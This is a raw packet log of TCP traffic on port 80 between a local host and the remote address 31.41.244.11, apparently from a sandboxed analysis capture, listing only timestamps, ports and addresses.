Dec 16, 2024 11:03:33.671838045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.671852112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.671890020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.672482967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.672538996 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.672542095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.672575951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.672594070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.672626972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.672647953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.672700882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.673288107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.673342943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.673346043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.673379898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.673401117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.673418045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.673427105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.673475027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.674103975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674139023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674169064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.674173117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674194098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.674220085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.674273014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674326897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.674884081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674938917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674942970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.674976110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.674994946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.675012112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.675028086 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.675062895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.675681114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.675791979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.675791979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.675827980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.675852060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.675868034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.675877094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.675916910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.676470041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.676525116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.676527023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.676562071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.676577091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.676613092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.676632881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.676688910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.677258015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.677314997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.677318096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.677354097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.677375078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.677391052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.677402020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.677440882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.678051949 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678107977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678109884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.678143978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678169966 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.678179979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678190947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.678229094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.678870916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678925991 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678929090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.678965092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.678985119 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.679001093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.679012060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.679044962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.679655075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.679712057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.679722071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.679752111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.679786921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.679790020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.679800987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.679840088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.852925062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.852955103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.852971077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.853066921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.853080988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.853153944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.853260040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.853276014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.853292942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.853321075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.853380919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.853851080 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.853864908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854016066 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854026079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.854033947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854068995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.854120970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.854711056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854727983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854743004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854782104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.854820013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.854888916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.854944944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.855411053 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.855467081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.855559111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.855576992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.855614901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.855633020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.855720043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.855772972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.856300116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.856353045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.856499910 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.856514931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.856553078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.856576920 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.856671095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.856730938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.857254982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.857270956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.857286930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.857314110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.857352972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.857426882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.857475996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.858154058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858190060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858206987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858222961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858237028 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.858274937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.858664036 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858715057 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.858854055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858870983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858887911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.858907938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.858932018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.859541893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.859556913 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.859576941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.859602928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.859622955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.859704971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.859756947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.860363007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.860378981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.860394955 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.860418081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.860455036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.860529900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.860584021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.861047983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.861102104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.861224890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.861241102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.861257076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.861279964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.861309052 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.862052917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862067938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862085104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862103939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.862139940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.862204075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862251997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.862796068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862812042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862827063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.862857103 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.862890005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.862972975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.863028049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.863563061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.863579035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.863596916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.863616943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.863643885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.863732100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.863782883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.864305019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.864320040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.864337921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.864361048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.864388943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.864453077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.864505053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.865202904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.865219116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.865233898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.865248919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.865262032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.865300894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.865856886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.865911007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.866053104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866069078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866086960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866106033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.866133928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.866750956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866766930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866782904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866797924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.866802931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.866841078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.867451906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.867506027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.867644072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.867659092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.867674112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.867700100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.867738008 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.868182898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.868237019 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.868356943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.868372917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.868408918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.868427992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.868519068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.868566036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.869246006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.869261026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.869277000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.869301081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.869335890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.869409084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.869463921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872033119 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872061014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872077942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872085094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872108936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872133017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872189999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872205973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872221947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872237921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872241020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872272968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872308969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872524023 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872539997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872555017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872570992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872576952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872589111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872601986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872606039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872642040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872665882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872879028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872895002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872910976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.872936964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.872962952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.873028994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.873044968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.873060942 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.873090982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.873111010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.873156071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.873212099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044197083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044243097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044272900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044280052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044313908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044317007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044327021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044369936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044408083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044447899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044465065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044498920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.044512987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.044545889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045027018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045140028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045150995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045175076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045188904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045212030 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045223951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045258999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045717955 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045764923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045816898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045852900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045864105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045897007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.045921087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.045990944 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.046446085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.046500921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.046504021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.046536922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.046561003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.046580076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.046581030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.046627045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.047236919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.047288895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.047295094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.047344923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.047344923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.047384024 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.047394991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.047435045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048093081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048127890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048147917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048165083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048170090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048203945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048209906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048249960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048805952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048861027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048866034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048894882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.048908949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048940897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.048966885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.049022913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.049596071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.049647093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.049650908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.049699068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.049705029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.049743891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:34.049756050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.049794912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:34.050405979 CET	80	49833	31.41.244.11	192.168.2.5
